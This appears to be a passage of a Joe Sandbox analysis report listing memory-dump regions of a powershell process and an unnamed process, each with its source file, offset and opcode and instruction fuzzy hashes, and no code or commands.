                                                                        • Source File: 00000008.00000002.1541311591.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4700000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0dcdbe0eebb5961120546268ca39e11c75af9f9ba049ffe7ce32ca1c9d6e2dda
                                                                        • Instruction ID: 26b16b99d001cc52b350df0da1a89e30e40dfd24453495b45bb4ea222fc919a6
                                                                        • Opcode Fuzzy Hash: 0dcdbe0eebb5961120546268ca39e11c75af9f9ba049ffe7ce32ca1c9d6e2dda
                                                                        • Instruction Fuzzy Hash: 88916D75A01605CFDB15CF58C498AAAFBF1FF48310B2485A9D815AB3A6C735FC51CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1541311591.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4700000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: effc0993df393776c461e2b2ee6b05e39d6977e763cc6579d5204d75568515d1
                                                                        • Instruction ID: 983ddab823a8e8aaa73c266409d30534b7e7250549ce68ca3728bf61048e8371
                                                                        • Opcode Fuzzy Hash: effc0993df393776c461e2b2ee6b05e39d6977e763cc6579d5204d75568515d1
                                                                        • Instruction Fuzzy Hash: 9481C034A05248CFCB05CFA9D4909AEBBF1FF89310B1480AAE455AB3A2C735ED55DF60
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1564583316.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 77befa03ee7764f88f654700de26454d32e9e6831a8eecebe7b3f29df743a90f
                                                                        • Instruction ID: c96dcad577c20c97dc0c048a1e9ff74b022da8509bb7d08cb58d61c27d7679eb
                                                                        • Opcode Fuzzy Hash: 77befa03ee7764f88f654700de26454d32e9e6831a8eecebe7b3f29df743a90f
                                                                        • Instruction Fuzzy Hash: 3341D4F5A0460A8FEB10DEA98541BFA77B2FF81250F14809FD8049B257D779C981CBA7
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1541311591.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4700000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6898f45cc7f41c5c1839298830f5a09a408420480191b8b82d38dcabb7f0748c
                                                                        • Instruction ID: b36993177c504a8983a5dc121e133c4f529d7067b45f405d9ef259f40115c6a9
                                                                        • Opcode Fuzzy Hash: 6898f45cc7f41c5c1839298830f5a09a408420480191b8b82d38dcabb7f0748c
                                                                        • Instruction Fuzzy Hash: 70415B75A01605CFCB06CF58C098AAAFBF1FF48310B1585A9D815AB3A5C732FC91CBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1541311591.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4700000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff257d549b23854702494f8f4ca5557c719463b8728ef49cecf821cb3e0fbbe8
                                                                        • Instruction ID: e7f148d93eb83ddfbb9661bceb0567527b81ee6521629afa703e738c65f3201c
                                                                        • Opcode Fuzzy Hash: ff257d549b23854702494f8f4ca5557c719463b8728ef49cecf821cb3e0fbbe8
                                                                        • Instruction Fuzzy Hash: EA315074A05386CFCB0ADF69C89099ABBB4FF4A25070544D6D449DB353C734F855CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1541311591.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4700000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a95c76ec102de13c57721e79e5c22f1a164fe64b139c302230ba71d2cc648b5
                                                                        • Instruction ID: 07718faae1362f7341ad2a957b15d512f567bffb60612268d4af89840d20d1b3
                                                                        • Opcode Fuzzy Hash: 9a95c76ec102de13c57721e79e5c22f1a164fe64b139c302230ba71d2cc648b5
                                                                        • Instruction Fuzzy Hash: 28211774A05249CFCB04DF98D4909AABBF4FF89310B1580A9E809EB352D331FC41CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1536228633.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_c8d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d8c6a9dc2f0f49d4b7e4ddbb3236277e3fb1aac66c80aa46d45d35e08d497307
                                                                        • Instruction ID: a251ece267ed689da6f9856f5f8208e05569c27d14c47c3aba5b03c660423b58
                                                                        • Opcode Fuzzy Hash: d8c6a9dc2f0f49d4b7e4ddbb3236277e3fb1aac66c80aa46d45d35e08d497307
                                                                        • Instruction Fuzzy Hash: 7E01296200E3C05FD7128B258D94B52BFB49F53224F1980DBD8998F1E3C2699849C772
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1536228633.0000000000C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C8D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_c8d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 409beb5fd3ab675816b8754b3a681dc02b57b3e10778d6f587d89b5e699a6aab
                                                                        • Instruction ID: 3ba577881ea42f68e8a2032490b2eddbf455b9ca6a34fa6a0b9dae43dabb7155
                                                                        • Opcode Fuzzy Hash: 409beb5fd3ab675816b8754b3a681dc02b57b3e10778d6f587d89b5e699a6aab
                                                                        • Instruction Fuzzy Hash: 9B01F2325043449FE710AA26CDC0B67BB98DF41328F18C01AEC1A4B2C2C7799D41CBBA
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1541311591.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4700000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7b585da437ceb9f1975e01f630665feca9a418b864a7323a18a273e242b4c567
                                                                        • Instruction ID: 564b115852d1d50aa596e4b0cfb6fa118e04443131c2544f9e344e14de5e5032
                                                                        • Opcode Fuzzy Hash: 7b585da437ceb9f1975e01f630665feca9a418b864a7323a18a273e242b4c567
                                                                        • Instruction Fuzzy Hash: E801A23550D3918FE702DBBCD8A07D9BBF59F8A224F1584C3C0948B193C625A85ACB6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1541311591.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_4700000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fb70a9115c171d141adb7d36a82b6caadde99f110ba98a7e16a37a373c1a3d2
                                                                        • Instruction ID: eace49feb1c709e0975cf22d4a3a24c09329ecf5ac81c2bdf422dbaa4da1d9c3
                                                                        • Opcode Fuzzy Hash: 0fb70a9115c171d141adb7d36a82b6caadde99f110ba98a7e16a37a373c1a3d2
                                                                        • Instruction Fuzzy Hash: 62F09674A00204DFCB04CB99C8546A9F7B6FF88310735C159D95AA7751CB36AC52CB91
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f5937cab3da4dacda43602b4a232fe8595225a98a20db7c3e1bb975f530ee87
                                                                        • Instruction ID: 169c7c1a5687444cf559d41119bc443a00557028ea11fdadc515d6c982be4729
                                                                        • Opcode Fuzzy Hash: 7f5937cab3da4dacda43602b4a232fe8595225a98a20db7c3e1bb975f530ee87
                                                                        • Instruction Fuzzy Hash: 4CF17F74E01319DFDB18DFB8D8546AEBBB6BF88310B148529E806EB344DF359846CB51
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7680b2adcffef2b920f2967ef29483881cf75d15b259556d1db1c8abb5cf1c44
                                                                        • Instruction ID: 2792b8a54c2477f0e1d89700f768e903e043038a267918b0ce4512a158ff3cc7
                                                                        • Opcode Fuzzy Hash: 7680b2adcffef2b920f2967ef29483881cf75d15b259556d1db1c8abb5cf1c44
                                                                        • Instruction Fuzzy Hash: EC22FEB890121EDFCB64EF64E994A9DB7B6FF48304F1085AAD819AB358DB305D85CF40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6c7610332d035a705b9e25e9a3bf07938f398ae5bcb28e29cb9acfd0197325af
                                                                        • Instruction ID: b8d5ad149af180cce61be91f2998988c9ed193b834423a2608f3a76a6982abfd
                                                                        • Opcode Fuzzy Hash: 6c7610332d035a705b9e25e9a3bf07938f398ae5bcb28e29cb9acfd0197325af
                                                                        • Instruction Fuzzy Hash: F422FDB890121EDFCB64EF64E994A9DB7B6FF48304F1085AAD819AB358DB305D85CF40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cd46d0a427b21c517ef933e98da0e32011e29e668807d990474548f53cbef18
                                                                        • Instruction ID: 1223783df138afbda40a4446e7b4eb231fcf38e7354fd7d0344a5c21efdcc477
                                                                        • Opcode Fuzzy Hash: 7cd46d0a427b21c517ef933e98da0e32011e29e668807d990474548f53cbef18
                                                                        • Instruction Fuzzy Hash: 9B312875704318CBEF3E89BA489427E67E9BFC5228F044039D846E7281DB7CCC05A761
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7ee5d25fe609cc02f1fc763f3a38dc640694076878e11cdb3e55f0c87d924dbc
                                                                        • Instruction ID: 30bca57658de457e245f574ced2bd7609351c132c96e30cec7eb8de6c76a94f3
                                                                        • Opcode Fuzzy Hash: 7ee5d25fe609cc02f1fc763f3a38dc640694076878e11cdb3e55f0c87d924dbc
                                                                        • Instruction Fuzzy Hash: 8D21B235A00109EFDB25EB68D4909AF77AAEF98354F10C469E8098B250DB35EE45CBE1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796137640.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_116d000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 65a9a7494ea446a9f0ef2455fb3facc608023f5bac1acb3384efd463ced1f68b
                                                                        • Instruction ID: df8a77e034a368d8c345465a4814575daa2968fbe960b19ed605e7b39b30b0cc
                                                                        • Opcode Fuzzy Hash: 65a9a7494ea446a9f0ef2455fb3facc608023f5bac1acb3384efd463ced1f68b
                                                                        • Instruction Fuzzy Hash: 94210671604244DFDF19DF94E8C0B66BB69FB84314F24C169D9490BA46C337E866C7A2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ed895162081e0aba8a3053ff47e5a6504f8f00068c4bc01e9bbd4ba489a28c96
                                                                        • Instruction ID: fe7073930081e11275c775026f0f8192771c652c83e67762144059c7ca7f5b43
                                                                        • Opcode Fuzzy Hash: ed895162081e0aba8a3053ff47e5a6504f8f00068c4bc01e9bbd4ba489a28c96
                                                                        • Instruction Fuzzy Hash: D711AB35E0834E9FCB029BB8AC104DEBB34FF8A2107248797D626B70A2E9251805C361
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c8395c91886ab52de32de5516ba4d805a3d969e708461c0a1cec09364955da0a
                                                                        • Instruction ID: 309bf1ff56706bec212c5f8d51a948a8581d6f6b7cc3ccf7e8b064f72e54718d
                                                                        • Opcode Fuzzy Hash: c8395c91886ab52de32de5516ba4d805a3d969e708461c0a1cec09364955da0a
                                                                        • Instruction Fuzzy Hash: 7C319F78E01208DFCB54EFA8E59489DBBB6FF49305B20446AE819AB324D731AD05CF40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796137640.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_116d000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                        • Instruction ID: e4767294b9fcd6806f845968b1d387d2defc97ee62e0dcc41f288a3a0c4fdcf6
                                                                        • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                        • Instruction Fuzzy Hash: 5711CD72504280CFCF16CF44D5C4B56BF61FB84224F28C1A9D8490AA56C33AE866CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 49f8835bb4ee93e6353ce469a7243427966cc828df4db0c27170d395694c5d53
                                                                        • Instruction ID: f198e5bf24b2e290ada0c53dc5b6956a4f3f8b3a16277925b430c5a70f91a529
                                                                        • Opcode Fuzzy Hash: 49f8835bb4ee93e6353ce469a7243427966cc828df4db0c27170d395694c5d53
                                                                        • Instruction Fuzzy Hash: 5A21BFB4C052098FCB65EFA8D8555EEBFF0FF09310F10426AD815B6224EB341A89CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e9a695aa83eba7b7a12203a801184e7d6257ba71ff814a131e749a6744282dc5
                                                                        • Instruction ID: a0fca764ba8ecf77bfd06ef877d03420d36783bf5371bdb5b3128715613c21ac
                                                                        • Opcode Fuzzy Hash: e9a695aa83eba7b7a12203a801184e7d6257ba71ff814a131e749a6744282dc5
                                                                        • Instruction Fuzzy Hash: 6721FFB5D0520D8FDB21EFA8D4445EEBFB0BF49304F10426AD855BA264EB301A89CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bca4b776ff7152ca9f891a0f552f9a3729e7cb1b33195419d70489719048c7f1
                                                                        • Instruction ID: a19e8b08a63a22eab77e52e868b6b530aebfed391fdfd6c3d8a4550c563a12ab
                                                                        • Opcode Fuzzy Hash: bca4b776ff7152ca9f891a0f552f9a3729e7cb1b33195419d70489719048c7f1
                                                                        • Instruction Fuzzy Hash: 1CE09231D243668FC711ABA8A8540EEBF70AE92724B11456BD0906A041EB70199AC7A1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.1796641855.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_1370000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1e79c57c5d01ac9d3e9d96db6961b36e2ac6cc6cb78478e8abede24c81c3417f
                                                                        • Instruction ID: a7925a47f84833d748cca345b0d4b124d72dd65a835aba162b19291c4699523a
                                                                        • Opcode Fuzzy Hash: 1e79c57c5d01ac9d3e9d96db6961b36e2ac6cc6cb78478e8abede24c81c3417f
                                                                        • Instruction Fuzzy Hash: D8D01732D2022A979B10AAA9DC048EEBB38EE96621B908626D52437140EB70265986B1